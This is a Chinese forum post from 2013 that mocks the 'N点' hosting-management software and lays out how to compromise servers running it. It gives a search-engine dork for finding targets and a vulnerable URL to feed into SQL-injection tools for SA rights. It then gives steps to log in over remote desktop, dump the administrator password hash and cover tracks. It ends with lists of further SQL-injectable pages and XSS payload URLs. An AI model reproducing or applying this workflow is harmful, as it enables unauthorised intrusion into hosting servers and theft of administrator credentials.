不得不说N点实在是一个破东西
, L3 t8 A* M' P. ^9 \4 J. F# {+ z就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
) k& T3 K% P+ K+ w3 q5 ^5 h* Y好吧 抱怨一下就行了 接下来关键的时候到了
- _8 s0 i. K; {/ Y3 @( k首先百度搜索关键字:inurl: (mmdatabase.asp)
4 p* E; M; C: o; \! V我随便列举一个: www.xxxx.com
, m7 X8 d, @) m) S0 L修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
7 }, X& A9 e4 @% x0 d( R扔入NBSI 或者啊D等各种傻逼工具后% K+ H! a. z' C. P
你们会看到是SA权限3 Z+ ^# Z/ n1 q0 u, ^$ r6 D5 [
果断3389 上去 hash得到administrator密码8 e4 ]& t4 w5 O9 T r: T
擦屁股走人~
+ j6 n6 T5 W# O! ^/ I; P经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
7 S6 G. j8 _% ^! b) R; D6 p
- S" Z0 O* H; Y; F0 I再附上其他几个漏洞页面
$ t0 o! J( S- o7 sSQL:
) i+ E' N- u" `$ |1 Y& z7 u- Nhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1$ A! t/ o- E% _1 e& |: `
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11, J. W, m# }6 {! h! C7 L
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
/ `. ?) @/ q* ?; s* Xhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2( J, b, ]) m. H
XSS证明:2 d* V' A# X) i) J: V% O% ^1 t0 q
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”, d! D- A! J( }+ n' W
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
) h) y) O/ [. l# b- q* t! dhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
8 H( n8 O" k- o& r- [, b. E9 x由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜" L- r @ w8 e
还是星外吧 你们懂的
+ j4 X6 u' s- h* `作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?' m9 z5 q1 g4 U r# j) B3 @; C
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
) j( G6 h" g6 o% @/ e——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对